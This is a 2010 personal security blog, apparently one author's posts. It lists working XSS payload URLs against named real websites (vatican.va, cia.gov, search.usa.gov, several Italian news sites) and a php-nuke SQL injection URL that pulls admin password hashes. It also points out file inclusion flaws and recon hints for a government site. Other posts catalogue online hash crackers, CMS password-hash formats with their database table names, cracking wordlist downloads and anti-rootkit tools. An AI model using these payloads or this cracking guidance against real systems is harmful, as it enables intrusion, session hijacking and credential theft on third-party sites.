Friday, 30 April 2010

vatican.va | XSS - SQL injection - system compromise

Yes, it could be done.
More informations soon on this blog. (remember ... no defacements, no data retrieval, no bad things)


Meanwhile I've found this simple xss (put an xss in any text box)

http://asv.vatican.va/cercait/index.php?advanced=1
 "><video src=1 onerror=alert(document.cookie)>

Anyway, I'm playing on something else that is more interesting.

http://www.gossipnews.it | xss

xss in quite all the pages

--------------------------OLD-----------------------
http://www.gossipnews.it/cinema/vedifoto.php?id=3cbd57ad5223375ca2a5089283966818&num=19%3Cscript%3Ealert(document.cookie);%3C/script%3E&

http://www.gossipnews.it/musica/gli_zero_assoluto_fotorw.html?id=5ccabcbfb5861ba35a6b271c76a5ade0&num=5%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C%22

any location - http header injection
http://www.gossipnews.it/open/www/delivery/ck.php?oaparams=2__bannerid=537__zoneid=50__cb=1812239d6e__oadest=http%3A%2F%2Fwww.google.com
--------------------------------------NEW -------------------------------
http://www.gossip.it/news/monografia.php?keyword=ssasdadas"><script>alert(1);</script>

teletu.it | XSS

http://supporto.teletu.it/cerca/?query=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22&search=1

any xss in the forms
http://www.teletu.it/teletu/nuova-linea.php
http://www.teletu.it/tuttocompreso/offerte/tutto-per-te.php

webnews.it | xss

http://cerca.webnews.it/w.sl?us=fs&q=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3C%22&t=webnews&cat=

cia.gov | XSS

The <> tags are not allowed but the "= can be injected so we can add to the  <input> tag a style to enlarge the area and an onmouseover so that a javascript will be fired when the mouse pass over the (enlarged) text input.
We can do also other things but this should be enough.

https://www.cia.gov/search?q=%22%20style%3d%22height:900px;%22%20onMouseOver%3d%22alert(document.cookie)


Screenshot

www.adnkronos.com | XSS - Local file inclusion (php)

XSS

modifies the script within the setTimeout (works after 300000 ms)
http://www.adnkronos.com/IGN/Zoom/?id=3.0.4217592951');alert(document.cookie+'
http://www.adnkronos.com/IGN/Zoom/?id=3.0.4217592951');alert(document.cookie);",1);setTimeout("alert('

Local File Inclusion
the same problem is identical in several parts of the website even if blind (no error in the output).
http://www.adnkronos.com/IGN/Zoom/?id=

sample error (added a ' )
Warning: include(news/3.0.4217592951\'.inc.php) [function.include]: failed to open stream: No such file or directory in /opt/apache2/www60/IGN/Zoom/index.php on line 11

Warning: include() [function.include]: Failed opening 'news/3.0.4217592951\'.inc.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /opt/apache2/www60/IGN/Zoom/index.php on line 11

The error doesn't always appear. Probably the response is from different servers and only one of those is  showing the errors to the output. I'm not really sure and I'm not doing any further testing (files are included and executed for sure).

www.opensourcecms.com www.tradepub.com | several XSS

Several XSS all over the website (more than the listed).


samples (xss after the id or the page will redirect)

http://php.opensourcecms.com/scripts/details.php?scriptid=339%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cval=&name=Mac's%20CMS

http://php.opensourcecms.com/scripts/show.php?catid=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C&cat=CMS%20/%20Portals

http://php.opensourcecms.com/news/index.php?page=2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C&sortby=dateasc

http://php.opensourcecms.com/scripts/details.php?scriptid=19%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C&name=e107
 
 sample on tradepub.com closing the comment in the html
http://php-opensourcecms.tradepub.com/?pt=cat&page=Cons--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!-- 




there are several other.

Thursday, 29 April 2010

Portable Oracle EX - Help needed

I'm working on a Portable version of Oracle EX (server) for windows. The NSIS and all the relevant files will be released as open source (no specific license will be used).
I will share without problems the gathered data. The list of the binary files, the registry files (.reg) etc.
Actually I'm still collecting the registry modifications that are a lot, especially for the registered components.
There are also modifications to the group policies made by the installer of oracle, I've only seen them but I still don't know how much time they will require.
The oracle odbc installation is half working.
Obviously the final version will not include the oracle's binary files.

I've a static version, with fixed paths,
If someone is interested into helping me please leave a comment.

lostregone.net | XSS, file inclusion

Even if with some server side checks the XSS passed.

http://www.lostregone.net/index.php?words=<video src=1 onerror=alert(String.fromCharCode(112,97,115,115,101,100))>&where=1&go=Vai!&rate=5&id=5062&cal_month=Apr&cal_year=2010&submitted=true&address=Indirizzo+E-mail&action=add

Remote File Inclusion (the script is liga manager online)
http://www.lostregone.net/GSC/gsc.php?action=table&tabtype=0&file=..

www.ilsannioquotidiano.it | XSS Sql Injection

Any old phpnuke bug. There's no fun.

XSS
http://www.ilsannioquotidiano.it/sections.php?op=printpage&artid=1%3Cscript%3Ealert(document.cookie);%3C/script%3E

old php-nuke sql injection
http://www.ilsannioquotidiano.it/sections.php?op=printpage&artid=-9999999/%3Cscript%3E**%20%20/union/**/select/**/aid,pwd/**/from/**/nuke_authors/*

ilquaderno.it | XSS

http://www.ilquaderno.it/commenta-articolo.php?idart=46069%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

http://www.ilquaderno.it/qsearch.php?q=%3Cscript%3Ealert(1);%3C/script%3E

blind SQL Injection (in the above links). The site uses only addslashes or gpc_magic_quotes that can be bypassed.

http://search.usa.gov how funny is the title!

http://search.usa.gov/search?query=funny%3C/title%3E%3C/head%3E%3Cbody%3E%3Cvideo%20src=1%20onerror=alert(document.cookie)%3E%3C/body%3E%3C/html%3E%3C!--


http://search.usa.gov/search?query=funny</title></head><body><video src=1 onerror=alert(document.cookie)></body></html><!--


So the search is adding without problems anything in the title.
I've just added the remaining opening tags (</title></head><body>)of the page, the script that i want, the closing tags (</body></html>) and an opening  comment in the end ( <!-- ).
Quite funny anybody can create a phishing page on usa .gov or get the sessions of the users (If I've time I will explain it in a simulation with a video - don't fear the fact that you cannot have an account).

-----------------------------------------------------
If I have a bit of time I will finish and publish my thoughts about social engineering with a real example (this one?) and other methods to get more privileges.

Hints -
The usa.gov url shortner with drupal
http://go.usa.gov/shorturl/user/1  <- All the accounts are acconected and the usernames can be retrieved easily (this is normal ... by design)
http://go.usa.gov/robots.txt <- drupal with all the installation files. Only some folders and files are forbidden.
PHP  5.2.12 (read write on
They use the same methods as on drupa.ly.
-----------------------------------------------------

They don't reply to my emails ... and the problems of a previous post have never been patched expecially the remote code execution. Maybe if I post a tutorial a swarm of kids will start to play on their site.
The governments are slow as hell and never patch until someone try deface them (not me for sure) or someone else is asking them money for their "security" (not me also in this case ...).

What a mad world.



----------------------------------------------------------------
Blarg!!!!
Let me add a song to this boring and useless post that I'm forced to truncate.
Those words are explainig what I think right now.

****
...
And I find it kinda funny I find it kinda sad
The dreams in which I'm dying
Are the best I've ever had
I find it hard to tell you
I find it hard to take
When people run in circles
It's a very, very mad world mad world
...


Tuesday, 27 April 2010

Online hash Crackers and Generators with ratings

Personal ratings. Links taken from google.

-Online hash Generators-
http://www.insidepro.com/hashes.php?lang=eng | Quite any kind - Maybe the best around
http://nediam.com.mx/winhashes/search_nt_hash.php | NTLM/LM - excellent
http://funprogs.topcities.com/hashgen.htm | NTLM/LM - good



-Online hash Crackers-
http://www.md5cracker.tk/ | MD5 - excellent - search on several md5 crack websites
http://www.google.com | excellent - several websites have an md5 or sha1 hash in the title or the url
http://www.yahoo.com | excellent - several websites have an md5 or sha1 hash in the title or the url
http://md5.hashcracking.com | MD5 - excellent - ~50,529,455,839 predefined hashes
http://www.tobtu.com/md5.php | MD5 - excellent
http://www.c0llision.net/ | MD5/NTLM/LM - excellent - requests via irc with several hashes - irc.after-all.org #md5crack
http://nediam.com.mx/winhashes/search_nt_hash.php | NTLM/LM - excellent
http://md5.rednoize.com/ | MD5/SHA1 - excellent
http://www.cmd5.org/ | MD5/md5(md5($pass))/sha1/md4/mysql/mysql5/md5($pass.$salt)/md5($salt.$pass)/md5(md5($pass).$salt)/md5(md5($salt).$pass)/md5($salt.$pass.$salt)/md5($salt.md5($pass))/md5(md5($pass).md5($salt))/md5(md5($salt).md5($pass))/sha1($username.$pass) - good
http://md5.overclock.ch/ | MD5 - good - server irc.rizon.net #md5
http://tools.benramsey.com/md5/ | MD5 - good - reverse hash
http://www.thepanicroom.org/index.php?view=md5 | MD5 - good - search on several md5 crack websites
http://sec-war.com/md5.php | MD5 - good - search on several md5 crack websites
http://passcracking.com | MD5 - good - w/ fast queue
http://www.md5decrypter.co.uk/ | NTLM/MD5/SHA1 - good (w/ captcha) multiple hashes (8)
http://gdataonline.com | MD5 - good - w/ multiple hashes (5)
http://www.cloudcracker.net | MD5/SHA1 - good
http://opencrack.hashkiller.com | MD5 - good - downloadable wordlist
http://www.md5this.com/crack-it-/index.php | MD5 - good - predefined+cracking - captcha(not working with opera)
http://www.md5crack.com | MD5 - medium
http://md5.thekaine.de | MD5 - medium - meta search engine
http://milw0rm.com/cracker/ | MD5/LM - poor (you need to wait for the spots) - decent wordlist
http://stupidsite.org/cracker/md5_cracker.php | MD5 - poor - predefined hashes
http://www.netmd5crack.com/cracker/ | MD5 - poor - predefined hashes
http://md5decryption.com | MD5 - poor - predefined hashes
http://www.bigtrapeze.com/md5/ | MD5 - poor - not updated; few results
http://md5hack.com/ | MD5 - poor
http://www.macrosoftware.ro/md5/index.php | MD5 - poor
http://www.md5decrypter.com/ | MD5 - poor
http://www.md5encryption.com/ MD5 - poor
http://www.plain-text.info/ | MD5/LM/NTLM/MySQL v2.32/SHA1 - requests via irc - irc.rizon.net #rainbowcrack
http://www.hashchecker.com/index.php?_sls=add_hash | MD5 - Paid Service with 99,99% of results (?) - poor
http://md5.idiobase.de/ | MD5 - very poor
http://alimamed.pp.ru/md5/ | MD5 - poor
http://bokehman.com/cracker/ | MD5 - poor
http://www.schwett.com/md5/ | MD5 - poor
http://md5.allfact.info/ | MD5 - poor
http://www.mmkey.com/md5/home.php | MD5/SHA256/ - mostly useless
http://www.xmd5.org/ | MD5 - poor
http://www.tmto.org/ | MD5 - seems to be good - ~308,288,137,504 predefined hashes - not tested
http://www.tydal.nu/article/md5-crack/ | MD5 - not tested/not working
http://cracker.kalkulators.org | MD5/SHA1/SHA256/LM/NTLM - medium - meta search engine - nice looking interface

http://www.farefuturofondazione.it/ http://www.ffwebmagazine.it | XSS

Several XSS (no reason to list them all)

http://www.ffwebmagazine.it/ffw/page.asp?VisImg=S&Art=5592&Cat=1&I=e.gif%22 onerror="alert(document.cookie)" &IdTipo=0&TitoloBlocco=Attualit%C3%A0&Codi_Cate_Arti=24

http://www.ffwebmagazine.it/ffw/Page.asp?Cat=Archivio&Tipo=UltimeNotizie&AlreadySelected=n&IdTipo=0&Codi_Cate_Arti=23&TitoloBlocco=Economia"></a><img src=1 onerror="alert(document.cookie)"><a href="&IdMenu=80&NomeMenu=Economia

http://www.ffwebmagazine.it/ffw/Page.asp?Cat=Archivio&Tipo=UltimeNotizie&AlreadySelected=y&IdTipo=0&Codi_Cate_Arti=50&TitoloBlocco=%3Cvideo%20src=1%20onerror=alert(document.cookie)%3E%3EIn%20Primo%20Piano

http://www.farefuturofondazione.it/ff/Page.asp?Cat=Archivio&Tipo=UltimeNotizie&ASL=y&IdTipo=0&CCA=43&TB=Pubblicazioni%3Cvideo%20src=1%20onerror=alert(document.cookie)%3E

http://www.farefuturofondazione.it/ff/page.asp?StrMotore=dada"><video src=1 onerror=alert(1)><"&Cat=Motore

Hashes Algorithms used in different web applications

Hashes Algorithms used in different web applications.
I've done this list by hand. Not all the hashes algos are correct (I've generically added md5 or ??? where is unkwnown).
If you are interested send corrections and I will update it.
I will publish also a better version with tabs.
You can reproduce it without problems. It's part of the project mdcrack gui on sourceforge.
Use the | as data separator.

-----------------------------------------------------------------------------------------------------------------------------------------------------
| Title | Hash Algorithm | TablePrefix | Table Name | Website |
-----------------------------------------------------------------------------------------------------------------------------------------------------
| 1C Битрикс | md5($pass) | | |http://www.1c-bitrix.ru/
| 1024cms | md5($pass) | | |http://www.1024cms.org/
| 4images | md5($pass) | | |http://www.4homepages.de/
| AboCMS | md5($pass) | ??? | users |http://www.abocms.com/
| AdaptCMS Lite | md5($pass) | | |http://www.adaptcms.com/
| Adrevenue | md5($pass) | | |http://www.adrevenue.co.uk/
| AEF | md5($salt.$pass) | | |http://www.anelectron.com/board/
| AIOCP | md5($pass) | | |http://www.aiocp.it/
| Artiphp | md5($pass) | | |http://www.artiphp.com/
| AVE CMS | md5(md5($pass)) | | |http://www.cmsmatrix.org/ave-cms
| b2evolution | md5($pass) | | |http://b2evolution.net/
| Basecmp | md5($pass) | | |http://www.basecmp.de/
| bbPress | md5($pass) | | |http://bbpress.org/
| beContent | md5($pass) | | |http://code.google.com/p/becontent
| Beehive | md5($pass) | ??? | User |http://www.magnettechnologies.com/products.htm
| BIGACE | md5($pass) | ????????? | |http://www.bigace.de/
| Bitrix | md5($pass) | | |http://www.bitrixsoft.com/
| bitweaver | md5($pass) | | |http://www.bitweaver.org/
| Black Pig (Sajon) | md5($pass) | | |http://www.blackpig.co.uk ????
| bloofoxCMS | md5($pass) | | |http://www.bloofox.com/
| ClanTiger | md5($pass) | | |http://www.clantiger.com/
| ClanSphere | md5($pass) or sha1($pass) | | |http://www.csphere.eu/
| CMScout | md5($pass) | | |http://www.cmscout.co.za/
| CMS Made Simple | md5($pass) | | |http://www.cmsmadesimple.org/
| Concrete5 | md5($pass) | | |http://www.concrete5.org/
| Constructr CMS | md5($pass) | | |http://constructr-cms.org/
| Contenido | md5($pass) | | |http://www.contenido.org/
| Contentteller CE | md5($pass) | | |http://www.contentteller.com/
| Coppermine PG | md5($pass) | | |http://coppermine-gallery.net/
| CPG-Nuke | md5($pass) | | |http://dragonflycms.org/
| CruxCMS | md5($pass) | | |http://www.cruxsoftware.co.uk/
| CustomerInfo | md5($pass) | | |
| DanneoCMS | md5($pass) | dn[версия]_ | users |http://www.danneo.com
| DataLife Engine | md5(md5($pass)) | dle_ | users |http://dlecms.com/
| DBHcms | md5($pass) | | |http://www.drbenhur.com/
| DeluxeBB | md5($pass) | | |http://www.deluxebb.com/
| Diferior | md5(md5($pass)) | | |http://diferior.com/
| Digitalus | md5($pass) | | |http://digitaluscms.com/
| DotNetNuke | sha1($pass) | | |http://www.dotnetnuke.com/
| Drupal | md5($pass) | | |http://drupal.org/
| e107 | md5(md5($pass)) | e107_ | user |http://e107.org/
| eazyPortal | md5($pass) | | |http://www.eazyportal.com/
| ecshoprus | md5($pass) | | |http://ecshoprus.ru/
| eLinks | md5($pass) | | |http://elinks.or.cz/
| eliteCMS | sha1($pass) | | |http://www.elitecms.com/
| Elxis | md5($pass) | | |http://www.elxis.org/
| Enano CMS | md5($pass) | | |http://enanocms.org/
| eoCMS | md5($pass) | | |http://eocms.com/
| Etomite | md5($pass) | | |http://www.etomite.org/
| Explay | md5($pass) | | |
| Exponent | md5($pass) | | |http://www.exponentcms.org/
| Flux CMS | md5($pass) | | |https://fosswiki.liip.ch/display/FLX/
| Frog | sha1($pass) | | |http://www.madebyfrog.com/
| FUDforum | md5($pass) | | |http://fudforum.org/
| Fundanemt | md5($pass) | | |http://www.fundanemt.com/
| glFusion | md5($pass) | | |http://www.glfusion.org/
| GeekLog | md5($pass) | | |http://www.geeklog.net/
| html-edit CMS | md5($pass) | | |http://www.html-edit.org
| Icy Phoenix | md5($pass) | | |http://www.icyphoenix.com/
| iDevAffiliate | sha1(idev_secret.$password) | | |http://www.idevdirect.com/
| iGaming | md5($pass) | | |http://www.igamingcms.com/
| ImpressCMS | md5($pass) | | |http://www.impresscms.org/
| Injader | md5($pass) | | |http://www.injader.com/
| Intellect Board | md5($pass) | ??? | User |http://intboard.ru/
| IPB 1.x.x | md5($pass) | ibf_ | members |http://www.invisionpower.com/
| IPB 2.x.x | md5(md5($salt).md5($pass)) | ibf_ | members_converge|http://www.invisionpower.com/
| ITA Forum | md5($pass) | itaf_ | user |https://sourceforge.net/projects/itaforum/
| Jaws CMS | md5($pass) | | |http://www.jaws-project.com/
| Joomla <=1.0.12 | md5($pass) | jos_ | users |http://www.joomla.org/ | Joomla >=1.0.13 | md5($pass.$salt) | jos_ | users |http://www.joomla.org/
| Kajona | sha1($pass) | | |http://www.kajona.de/
| KerviNet Forum | md5($pass) | | |http://photoweb.com.ua/
| Koobi CMS | md5($pass) | koobi_ | user |http://www.dream4.de/
| Koobi CMS >= 6 | md5(md5($pass)) | koobi_ | user |http://www.dream4.de/
| Lanius CMS | md5($pass) | | |http://www.laniuscms.org/
| LifeType | md5($pass) | | |http://www.lifetype.net/
| Mambo | md5($pass) | | |http://mambo-foundation.org/
| MDPro | md5($pass) | | |http://www.maxdev.com/
| MercuryBoard | md5($pass) | mb_ | users |http://mercuryboard.com/
| MiaCMS | md5($pass) | | |http://miacms.org/
| MigasCMS | md5($pass) | | |http://www.sebrac.webcindario.com/
| MiniBB | md5($pass) | minibbtable_| users |http://www.minibb.com/
| MODx CMS | md5($pass) | | |http://modxcms.com/
| Monkey CMS | md5($pass) | | |http://www.monkeycms.com/
| myBB 1.2.x | md5(md5($salt).md5($pass)) | mybb_ | users |http://www.mybboard.net/
| Nucleus | md5($pass) | | |http://nucleuscms.org/
| osCommerce | md5($salt.$pass) | ??? | customers |http://www.oscommerce.com/
| ocPortal | md5($pass) | | |http://ocportal.com/
| OneCMS | md5($pass) | | |http://www.onecms.it/
| OpenBB 1.0.8 | md5($pass) | | |http://www.openbb.com/
| PBLang | md5($pass) | /db/members/| |https://sourceforge.net/projects/pblang/
| Pecio CMS | sha1($pass) | | |http://pecio-cms.com/
| Phenotype CMS | md5($pass) | | |http://www.phenotype-cms.com/
| Phorum 5.0.x | md5($pass) | | |http://www.phorum.org/
| Photopost | md5($pass) | | |http://www.photopost.com/
| phpAds | md5($pass) | | |http://sourceforge.net/projects/phpadsnew/
| PHP-Fusion | md5($pass) | | |http://sourceforge.net/projects/php-fusion/
| PHP-Nuke | md5($pass) | nuke_ | authors |http://phpnuke.org/
| phpBB | md5($pass) | phpbb_ | users |http://www.phpbb.com/
| phpBB >= 3 | md5($phpbb3) | phpbb_ | users |http://www.phpbb.com/
| PhpMyForum | md5($pass) | pmf_ | user |http://phpmyforum.de/
| phpMyAgenda | md5($pass) | | |http://sourceforge.net/projects/phpmyagenda/
| PhpMySport | md5($pass) | | |http://phpmysport.sourceforge.net/
| phpListPro | md5($pass) | | |http://www.smartisoft.com/products.php?product=phpListPro
| PHPSurveyor | md5($pass) | | |http://www.limesurvey.org/
| PunBB 1.2.x | sha1($pass) | ??? | users |http://www.punbb.org/
| PhpWebSite | md5($pass) | | |http://phpwebsite.appstate.edu/
| phpWebThings | md5($pass) | | |http://www.phpwebthings.nl/
| PHPX CMS | md5($pass) | | |http://www.thisrand.com/scripts/phpx
| phpwcms | md5($pass) | | |http://www.phpwcms.de/
| PLUME CMS | md5($pass) | | |http://www.plume-cms.net/
| PostNuke | md5($pass) | | |http://www.postnuke.com/
| Rennder Pixie | md5($pass) | | |http://www.renderpixie.com/
| QuickSilver Forum | md5($pass) | qsf_ | users |http://www.quicksilverforums.com/
| Radiant | sha1(sha1($pass)) | | |http://radiantcms.org/
| Refbase | des($pass,$salt);$salt=substr(email, 0, 2)| | |http://www.refbase.net/
| RunCMS | sha1($username.$pass) | runcms_ | users |http://www.runcms.org/
| Seditio | md5($pass) | | |http://www.neocrome.net/
| Serendipity <=1.4.1 | md5($pass) | | |http://www.s9y.org | Serendipity >= 1.5 | sha1($pass) | | |http://www.s9y.org
| Shinobu | md5($pass) | | |http://shinobu.61924.nl/
| SilverStripe | md5($pass) | | |http://www.silverstripe.com/
| Slaed CMS | md5($pass) | slaed_ | users |http://www.slaed.net/
| SmallNuke 2 | md5($pass) | | |http://www.smallnuke.com/
| sNews | md5($pass) | | |http://www.snewscms.it/
| SMF 1.0.x | md5(HMAC) | smf_ | members |http://www.simplemachines.org/
| SMF 1.1.x | sha1($username.$pass) | smf_ | members |http://www.simplemachines.org/
| Snitz forums 2000 | SHA-256 | FORUM_ | MEMBERS |http://forum.snitz.com/
| Subrion | md5($pass) | | |http://www.subrion.com/
| TangoCMS | md5($pass) | | |http://tangocms.org/
| Tiki Wiki | md5($pass) | | |http://tikiwiki.org/
| Tinypug | md5($pass) | | |http://code.google.com/p/tinypug/
| TRIBiQ | md5($pass) | | |http://tribiq.com/
| Triton CMS | md5($pass) | | |http://www.tritoncms.com/
| Typo3 | md5($pass) | | |http://typo3.org/
| UseBB | md5($pass) | usebb_ | members |http://www.usebb.net/
| Vanilla | md5($pass) | LUM_ | user |http://www.vanillacms.com/
| vBulletin 2.16 | ??? | | user |http://www.vbulletin.org/
| VBulletin 3.x | md5(md5($pass).$salt) | | user |http://www.vbulletin.org/
| VikingBoard | md5($pass) | vboard_ | member |http://sourceforge.net/projects/vboard/
| Voodoo chat | md5($pass) | | |http://vochat.com/ ?????
| W-Agora | md5($pass) | [***]_ | users |http://www.w-agora.com/
| Website Baker | md5($pass) | | |http://www.websitebaker2.org/
| Webspell | md5($pass) | ws_ Rand(3)_| user |http://www.webspell.org/
| Wordpress | md5($pass) | wp_ | users |http://wordpress.org/download/
| Wordpress >= 2.5 | md5($phpbb3) | wp_ | users |http://wordpress.org/download/
| WWWThreads | DES($pass) | w3t_ | users |http://www.wwwthreads.com/
| Xaraya (XarBB) | md5($pass) | | |http://www.xaraya.com/
| XMB Forum | md5($pass) | ??? | members |http://www.xmbforum.com/
| XOOPS | md5($pass) | xoops_ | users |http://www.xoops.org/
| YaBB | md5(HMAC) | yabbse_ | members |http://www.yabbforum.com/
-----------------------------------------------------------------------------------------------------------------------------------------------------

Saturday, 24 April 2010

Theregister.co.uk XSS


Lately I've found a stored XSS on theregister.co.uk.
The xss can be used only by sending, via a POST request,
both values "job_function" and "other_job_function" (or both "job_sector" "other_job_sector")
in the -users' area-.
By sending a specific link we can excalate privileges with the automation of the reset of the victim's password.
Obviously the victim should be logged in!
A full video explaining how to get other accounts starting from the the stored XSS and a few CSRF

You can watch here a video explaining the problem and the simulation
of the hijacking of a session of a theregister's user.

Archived page on securitytube: http://archive.is/OgZlz


They have already replied to my email and solved the problem! Thumbs up for them.

Thursday, 22 April 2010

List of wordlists

I've put up a list of links to several wordlists. Links have been grabbed from several websites:

I don't know your blog, I've found the links on on different websites.

(I've used http://rapiddigger.com/ and similar sites so I've not cared before about the references. Add a comment if you want a link. There's no problem about it.)
http://carlitobrigante.wordpress.com/2008/03/21/wyd-e-raccolta-wordlist/
http://blog.advanced-techno.net/index.php/2008/07/13/wordlist-da-15-gb/
http://www.backtrack-linux.org/forums/old-pentesting/4336-%3Dxploitz%3D-thread-share-wordlist-2.html
http://www.ashiyane.org/forums/showthread.php?p=60160
http://hashcrack.blogspot.com

I will update the list when I will find/need other links.

http://rapidshare.com/files/135050307/wordlist--hrvatski.txt.html
http://rapidshare.com/files/67152210/1_5GB_Wordlist_gepackt_5MB_.rar
http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/
http://www.ai.uga.edu/ftplib/natural-language/moby/
ftp://ftp.ox.ac.uk/pub/wordlists/
http://www.outpost9.com/files/WordLists.html
http://hashkiller.com/files/downloads/wordlists/
ftp://ftp.cerias.purdue.edu/pub/dict/
http://vxchaos.6x.to/Wordlists and Wordlist Tools/
http://www.hack3r.com/wordlists/wikipedia-wordlist-sraveau-20090325.txt.bz2
http://downloads.sourceforge.net/cracklib/cracklib-words-20080507.gz
http://packetstormsecurity.org/Crackers/wordlists/
http://gdataonline.com/downloads/GDict/
http://www.vulnerabilityassessment.co.uk/passwords.zip
http://www.cotse.com/tools/wordlists1.htm
http://www.cotse.com/tools/wordlists2.htm
http://www.insidepro.com/eng/download.shtml
http://www.apasscracker.com/dictionaries/
http://downloads.skullsecurity.org/passwords/
http://rapidshare.com/files/88229830/Wordlist.rar
http://rmccurdy.com/scripts/packetstorm_dic_john_1337.tar.gz
http://www.megaupload.com/?d=QTK6GI9K | birthdates
http://www.megaupload.com/?d=XV34VA9Z | default wpa list 8 to 40 alpha-numeric chararacters
http://www.megaupload.com/?d=L7LQSH5U |BIG WPA WORDLIST #1
http://www.megaupload.com/?d=2P23UCLV |BIG WPA WORDLIST #2
http://www.megaupload.com/?d=F6DEE204 |BIG WPA WORDLIST #3
http://article7.org/wordlists/
http://rapidshare.com/files/100655354/Bender-ILLIST.rar.html
http://milw0rm.org/mil-dic.php
http://www.rohitab.com/discuss/index.php?s=fc0c2d65c4f55e204846775b49346668&app=core&module=attach&section=attach&attach_id=1235
http://dualisanoob.com/tarballs/word_lists-20080618.tar.gz
http://nomorecrypto.com/files/naxxatoe-dict-total-new-unsorted.torrent
http://diablohorn.tbhost.eu/distribute/wordlists-sorted.gz.torrent
http://bright-shadows.net/download/downloads.php
http://www.mit.edu/~ecprice/wordlist.10000
http://www.neutronsite.com/WordList.txt
http://artofhacking.com/tucops/hack/password/
http://rapidshare.com/files/165513464/word.lst.s.u.john.s.u.200.part01.rar |wordlist su john #1
http://rapidshare.com/files/165518143/word.lst.s.u.john.s.u.200.part02.rar |wordlist su john #2
http://rapidshare.com/files/165498510/word.lst.s.u.john.s.u.200.part03.rar |wordlist su john #3
http://rapidshare.com/files/90611743/purehates_word_list.part1.rar | purehates wordlist #1
http://rapidshare.com/files/90620632/purehates_word_list.part2.rar | purehates wordlist #2
http://rapidshare.com/files/90628318/purehates_word_list.part3.rar | purehates wordlist #3
http://rapidshare.com/files/90636711/purehates_word_list.part4.rar | purehates wordlist #4
http://rapidshare.com/files/90639703/purehates_word_list.part5.rar | purehates wordlist #5
http://rapidshare.com/files/90571168/-_Xploitz_-_Master_Password_Collection.part1.rar
http://rapidshare.com/files/90580220/-_Xploitz_-_Master_Password_Collection.part2.rar
http://rapidshare.com/files/90584305/-_Xploitz_-_Master_Password_Collection.part3.rar
http://rapidshare.com/files/90592992/-_Xploitz_-_Master_Password_Collection.part4.rar
http://rapidshare.com/files/90598343/-_Xploitz_-_Master_Password_Collection.part5.rar
http://rapidshare.com/files/90603742/-_Xploitz_-_Master_Password_Collection.part6.rar
http://rapidshare.com/files/90605481/-_Xploitz_-_Master_Password_Collection.part7.rar -->-> Password: http://forums.remote-exploit.org/
http://rapidshare.com/files/90652987/-_Xploitz_-_PASSWORD_DVD.part01.rar
http://rapidshare.com/files/90660770/-_Xploitz_-_PASSWORD_DVD.part02.rar
http://rapidshare.com/files/90673505/-_Xploitz_-_PASSWORD_DVD.part03.rar
http://rapidshare.com/files/90682244/-_Xploitz_-_PASSWORD_DVD.part04.rar
http://rapidshare.com/files/90691363/-_Xploitz_-_PASSWORD_DVD.part05.rar
http://rapidshare.com/files/90700044/-_Xploitz_-_PASSWORD_DVD.part06.rar
http://rapidshare.com/files/90702550/-_Xploitz_-_PASSWORD_DVD.part07.rar -->-> Password: http://forums.remote-exploit.org/

Tuesday, 20 April 2010

Anti rootkits list

Anti rootkits list




 ATool - http://www.antiy.net/download/atool.rar
 ATool (mirror) - http://www.kernelmode.info/ARKs/atool.rar
 Avast! Antirootkit - http://files.avast.com/files/beta/aswar.exe
 Antivir Antirootkit - http://dl.antivir.de/down/windows/antivir_rootkit.zip
 Catchme - http://www2.gmer.net/catchme.exe
 CodeWalker ARK - http://cmcinfosec.com/download/cmcark_cw0.2.4.500.rar
 CodeWalker ARK (mirror) - http://www.kernelmode.info/ARKs/cmcark_cw0.2.4.500.rar
 CsrWalker - http://www.rootkit.com/vault/DiabloNova/cwalker.rar
 DarkSpy 1.05 - http://www.rootkit.com/vault/cardmagic/DS105fix2beta.rar
 DeepMonitor - http://orkblutt.free.fr/DeepMonitor.exe
 Deep System Explorer - http://diamondcs.com.au/downloads/dsesetup.exe
 Dr. Web DwShark (mirror) - http://www.kernelmode.info/ARKs/DwShark.rar
 F-Secure Blacklight - ftp://ftp.f-secure.com/anti-virus/tools/fsbl.exe
 Find_Hidden_Dll (by Eric_71) 0.1.1.1 - http://eric71.geekstogo.com/beta/Find_Dll.exe
 GMER - http://www2.gmer.net/gmer.zip
 Helios - http://helios.miel-labs.com/downloads/Helios.zip
 Helios Lite - http://helios.miel-labs.com/downloads/Helios-Lite.zip
 HiddenFinder - http://www.wenpoint.com/download/HiddenFinder_setup.exe
 Hook Analyzer - http://www.resplendence.com/download/hookanlz302.exe
 HookShark - http://home.arcor.de/neotracer/HookShark.rar
 IceSword 1.22 (english) - http://mail.ustc.edu.cn/~jfpan/download/IceSword122en.zip
 IceSword 1.22 (english) (mirror) - http://www.kernelmode.info/ARKs/IceSword122en.zip
 Kernel Detective v1.3.1 - http://www.at4re.com/files/Tools/Releases/GamingMasteR/Kernel_Detective_v1.3.1.zip
 Kernel Detective v1.3.1 (mirror) - http://www.kernelmode.info/ARKs/Kernel_Detective_v1.3.1.zip
 kX-Ray 1.0.0.102 - http://bugczech.fu8.com/bin/kX-Ray_v1.0.0.102_XP32_beta.zip
 McAfee Rootkit Detective - http://download.nai.com/products/mcafee-avert/McafeeRootkitDetective.zip
 modGREPER - http://invisiblethings.org/tools/modGREPER/modGREPER-0.3-bin.zip
 NIAP Rootkit Detect Tools - http://www.rootkit.com/vault/uty/NIAPAntiRootkitTools.rar
 Panda Antirootkit - http://research.pandasecurity.com/blogs/images/AntiRootkit.zip
 Process Hunter - http://www.wasm.ru/baixado.php?mode=tool&id=359
 Process Walker - http://www.rootkit.com/vault/DiabloNova/ProcessWalker.rar
 Radix - http://www.usec.at/downloads3/radix_installer.zip
 RegReveal - http://www.geocities.jp/kiskzo/regreveal_v10beta3.zip
 RootkitDetector - http://www.tarasco.org/security/Rootkit_Detector_rkdetector/RootkitDetector.zip
 Rootkit Unhooker 3.8 - http://www.rootkit.com/vault/DiabloNova/RkU3.8.386.589.rar
 Rootkit Revealer - http://download.sysinternals.com/Files/RootkitRevealer.zip
